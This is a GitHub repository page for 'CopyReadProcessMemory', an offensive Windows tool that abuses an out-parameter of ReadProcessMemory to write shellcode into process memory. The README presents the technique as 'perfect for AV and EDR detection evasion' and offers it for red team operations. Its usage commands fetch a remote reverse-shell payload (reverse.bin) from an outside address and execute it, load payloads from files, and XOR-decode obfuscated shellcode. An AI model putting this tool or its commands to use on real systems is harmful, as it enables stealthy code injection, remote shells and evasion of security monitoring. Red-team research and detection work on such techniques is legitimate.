Skip to content
/ CopyReadProcessMemory Public

CopyReadProcessMemory expoits the miss-configuration/vulnerability present on the API Windows method ReadProcessMemory.

24 stars 9 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

chmod760/CopyReadProcessMemory

BranchesTags

Repository files navigation

CopyReadProcessMemory

Description

CopyReadProcessMemory expoits the miss-configuration/vulnerability present on the API Windows method ReadProcessMemory discovered by DarkCoderSc.

It exploits the nature of the in/out pointer param named *lpNumberOfBytesRead, that enables to write into process memory without calling common API methods to do so such as memcpy, this is perfect for AV and EDR detection evasion

BOOL ReadProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPCVOID lpBaseAddress,
  [out] LPVOID  lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesRead      <----------------------------- Vulnerable param
);

This tool can directly be used on red team operations as a POC.

Download

Just go the release section of the repo and download the latest version

https://github.com/chmod760/CopyReadProcessMemory/releases/tag/Stable-1.0

Usage

The main options of the program are the next:

CopyReadProcessMemory.exe -h

Usage:
  CopyReadProcessMemory [OPTIONS]

Modes (choose exactly one):
  -s, --string_inject <STRING>      Inject a raw string
  -f, --file_path <FILE>            Load payload from file
  -t, --remote_payload <TARGET>     Use remote payload

Options:
  -e, --execute                     Execute payload after processing
  -x, --xor                         XOR key to decode the shellcode
  -h, --help                        Show this help
  -V, --version                     Show version
image

There are three possible surfaces for attack scenarios (at least):

Remote shellcode in-memory inyection & execution

CopyReadProcessMemory.exe -t http://192.168.1.140:8081/reverse.bin -e

In terminal line shellcode inyection & execution

CopyReadProcessMemory.exe  -s "Copy Using ReadProcessMemory"

From external file shellcode inyection & execution

CopyReadProcessMemory.exe -f "C:\Users\Public\Download\reverse.bin" -e

Payload De-obfuscation

From an attacker’s perspective, dropping raw shellcode on a system usually means instant detection and failure. Because of this, attackers often obfuscate or encrypt their shellcode to avoid being flagged by AV/EDR solutions, which requires decrypting or de-obfuscating it in memory. To support this workflow, I added an extra feature that can de-obfuscate the payload using the -x argument, allowing you to provide the key used for de-xor’ing it.

CopyReadProcessMemory.exe -f C:\Users\Public\Downloads\reverse.bin_xored -e -x chmod760

It can also be applied to the other features described earlier in this document.

Additionally, a Python script is included to help with payload obfuscation.

Credits

Big kudos to Jean-Pierre LESUEUR (DarkCoderSc) for discovering the pointer vulnerability and posting it to the unprotect.it project, you can contact him here:

https://unprotect.it/users/public/profile/darkcodersc/

About

CopyReadProcessMemory expoits the miss-configuration/vulnerability present on the API Windows method ReadProcessMemory.

Resources

Readme
Activity

Stars

24 stars

Watchers

0 watching

Forks

9 forks
Report repository

Releases 2

Stable Version 2.0 Latest
Nov 27, 2025
+ 1 release

Packages

No packages published

Languages